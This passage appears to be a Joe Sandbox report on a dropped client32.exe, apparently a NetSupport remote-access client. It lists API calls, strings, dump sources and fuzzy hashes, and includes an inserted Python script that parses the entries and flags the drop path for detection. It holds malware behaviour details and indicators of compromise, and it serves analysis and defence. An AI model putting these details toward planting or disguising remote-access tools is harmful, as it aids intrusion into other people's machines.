                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeaveSleep
                                                                                  • String ID: Push
                                                                                  • API String ID: 1566154052-4278761818
                                                                                  • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                  • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                                  • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                  • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(6FA3B898,00000000,?,?,?,6F9FDA7F,?,00000000), ref: 6F9FA503
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 6F9FA568
                                                                                  • Sleep.KERNEL32(00000000,?,6F9FDA7F,?,00000000), ref: 6F9FA581
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898,00000000), ref: 6F9FA5B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                  • String ID:
                                                                                  • API String ID: 4212191310-0
                                                                                  • Opcode ID: 3847d9900a745e4f39cd2688ba349dd3868292f9b323f1b1f1cab5b40c4a7616
                                                                                  • Instruction ID: 6a2e79e1d5a883b727aebf1398ce68fba7fbcf7726b59de46cb6db3ed4a93a8d
                                                                                  • Opcode Fuzzy Hash: 3847d9900a745e4f39cd2688ba349dd3868292f9b323f1b1f1cab5b40c4a7616
                                                                                  • Instruction Fuzzy Hash: 3521AFB3D01B109FDB218E18DC41A9AB7BDAF83324F019527D856D7280D376F8928B92
                                                                                  APIs
                                                                                  • GetCommandLineA.KERNEL32 ref: 003A1027
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 003A107B
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 003A1096
                                                                                  • ExitProcess.KERNEL32 ref: 003A10A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3445791821.00000000003A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 003A0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3445765372.00000000003A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_3a0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                  • String ID:
                                                                                  • API String ID: 2164999147-0
                                                                                  • Opcode ID: fd669330d4b64a2c5165a0324d133a4a1ef91ddd6727b66bfa34bfe6acae9b04
                                                                                  • Instruction ID: 5d456e764b321d6668c6d9fa79d6dd8a6fda9bbbb3e3d70f1eb09e189401c3ca
                                                                                  • Opcode Fuzzy Hash: fd669330d4b64a2c5165a0324d133a4a1ef91ddd6727b66bfa34bfe6acae9b04
                                                                                  • Instruction Fuzzy Hash: 3E11D2644083C45AEB33DF6488487FBBFA9DF13390F264048ECD69714AD25648C7C7A5
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                  • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 1314093303-0
                                                                                  • Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                  • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
                                                                                  • Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                  • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                                  APIs
                                                                                  • ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111459F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                  • String ID: :
                                                                                  • API String ID: 2034136378-336475711
                                                                                  • Opcode ID: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                  • Instruction ID: 2f025fe159ad018ca32f107a988c6b97e10c7b7f69d8ea9c63f353a653f43b24
                                                                                  • Opcode Fuzzy Hash: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                  • Instruction Fuzzy Hash: 65213738C043599FDB21CF64CC44FD9BB68AF16708F6041D4D59967942EF706A8DCBA1
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, xrefs: 11144804, 11144812
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CurrentFileModuleNameProcess
                                                                                  • String ID: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                                  • API String ID: 2251294070-482702774
                                                                                  • Opcode ID: 751681083fa28ab0273cb23fb616810117bb1d4aec001fef4099e21270a1e4b8
                                                                                  • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                  • Opcode Fuzzy Hash: 751681083fa28ab0273cb23fb616810117bb1d4aec001fef4099e21270a1e4b8
                                                                                  • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
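The entries above are the per-function output of the Joe Sandbox IDA plugin: the API calls a function makes, the strings it touches, the dump it was carved from, and the API ID / String ID / fuzzy-hash fields under "Similarity" that are meant for pivoting between reports. The Python below is an added example for this page, not Joe Sandbox code and not part of the report. It parses such entries into records, builds the Instruction Fuzzy Hash to API ID map used to diff one report's functions against another's, and flags the functions that reference the dropped client32.exe path seen in the entry directly above. The embedded sample text is a constructed excerpt copied from two of this report's entries (the one above and the CreateThread/AutoICFConfig one earlier in this section), the field and helper names are the example's own, and the regex assumes the drop directory name generalizes to any subdirectory of AppData\Roaming, of which only XOQEKRYWQK-5 is observed here.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt: two function entries copied from this report, with leading
# whitespace and the "Download File" link text removed and "Associated:" lines dropped.
SAMPLE = r"""
APIs
• GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe,00000104,?,11144A43,?), ref: 11144819
Strings
• C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, xrefs: 11144804, 11144812
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CurrentFileModuleNameProcess
• String ID: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
• API String ID: 2251294070-482702774
• Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
APIs
• Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
• CloseHandle.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
Strings
Similarity
• API ID: CloseCreateHandleThread__wcstoi64
• String ID: *AutoICFConfig$Client
• API String ID: 3257255551-59951473
• Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
# One API bullet: optional "Part of subcall function X: " prefix, Api.MODULE,
# optional (args), then "ref: <address>".
API_RE = re.compile(r"^(?:Part of subcall function [0-9A-F]+: )?(?P<api>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
# Assumption: the drop directory generalizes to any subdirectory of AppData\Roaming;
# only XOQEKRYWQK-5 is observed in this report.
DROP_PATH_RE = re.compile(r"\\AppData\\Roaming\\[^\\]+\\client32\.exe$", re.IGNORECASE)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # "API ID", "String ID", hashes, dump source


def parse_entries(text):
    """Split the listing into one FunctionEntry per "APIs" header."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                cur = FunctionEntry()
                entries.append(cur)
            section = line
        elif cur is not None and line.startswith("•"):
            body = line[1:].strip()
            if section == "APIs":
                m = API_RE.match(body)
                if m:
                    args = m["args"].split(",") if m["args"] else []
                    cur.apis.append(ApiCall(m["api"], m["module"], args, m["ref"]))
            elif section == "Strings":
                value, sep, _xrefs = body.rpartition(", xrefs: ")
                cur.strings.append(value if sep else body)
            else:
                key, _, value = body.partition(": ")
                if value.endswith("Download File"):  # link text glued to dump names
                    value = value[:-len("Download File")]
                cur.meta[key] = value
    return entries


def entries_touching_dropped_client(entries):
    """Entries whose strings or API arguments name the dropped client32.exe."""
    hits = []
    for e in entries:
        texts = list(e.strings) + [a for call in e.apis for a in call.args]
        if any(DROP_PATH_RE.search(t) for t in texts):
            hits.append(e)
    return hits


def fuzzy_index(entries):
    """Instruction Fuzzy Hash -> API ID: the pair to diff against another report."""
    return {e.meta["Instruction Fuzzy Hash"]: e.meta.get("API ID", "")
            for e in entries if "Instruction Fuzzy Hash" in e.meta}
```

Run parse_entries over the whole pasted function listing of a report, not just the excerpt; the fuzzy_index output of two reports can then be set-intersected to see which functions survived between two NetSupport drops even when the install directory name changed, which the API ID alone cannot distinguish.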
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __strdup
                                                                                  • String ID: *this==pszSrc$..\CTL32\NSMString.cpp
                                                                                  • API String ID: 838363481-1175285396
                                                                                  • Opcode ID: 7244959e6880bffd10a273b22dd5c93d76c3f537a87f38f753278ccf60d995ca
                                                                                  • Instruction ID: 29c62dc5338ff495c898086ff50a52fd619e2258fc3847dfd771a07a915be9b0
                                                                                  • Opcode Fuzzy Hash: 7244959e6880bffd10a273b22dd5c93d76c3f537a87f38f753278ccf60d995ca
                                                                                  • Instruction Fuzzy Hash: 95F028B5E003525BEA00DE6AB804A9BFBD89FC2298F44847AE8DDE7311E570B405C6D4
APIs
• _malloc.LIBCMT ref: 11110239
  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
• _memset.LIBCMT ref: 11110262
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
• String ID: ..\ctl32\Refcount.cpp
• API String ID: 2803934178-2363596943
• Opcode ID: 682feaadb0c8680301ec8f4634659c3c3f42cf446e565166f1417036573033b6
• Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
• Opcode Fuzzy Hash: 682feaadb0c8680301ec8f4634659c3c3f42cf446e565166f1417036573033b6
• Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
APIs
• CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
• CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseCreateFileHandle
• String ID: \\.\NSWFPDrv
• API String ID: 3498533004-85019792
• Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
• Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
• Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
• Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _calloc
• String ID:
• API String ID: 1679841372-0
• Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
• Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
• Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
• Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
APIs
• _memset.LIBCMT ref: 6F9F8FE4
• getsockname.WSOCK32(?,?,00000010,?,03022F58,?), ref: 6F9F9005
• WSAGetLastError.WSOCK32(?,?,00000010,?,03022F58,?), ref: 6F9F902E
  • Part of subcall function 6F9F5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6F9F8F91,00000000,00000000,6FA3B8DA,?,00000080), ref: 6F9F5852
Memory Dump Source
• Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
• Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorLast_memsetgetsocknameinet_ntoa
• String ID:
• API String ID: 3066294524-0
• Opcode ID: d294a6fa08ef33e2d20bee3a148b99982e5086a0931526cf6e1d219508d4e3a5
• Instruction ID: 0e999d0f5e006711758ad831813cf479ade4458ef019902e6315835a34479b25
• Opcode Fuzzy Hash: d294a6fa08ef33e2d20bee3a148b99982e5086a0931526cf6e1d219508d4e3a5
• Instruction Fuzzy Hash: 81111C72A04218ABDB00DFA9DD01ABEB7FCEB49214F11456AEC05E7280E774AA558B91
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
• __wsplitpath.LIBCMT ref: 11112185
  • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
• GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
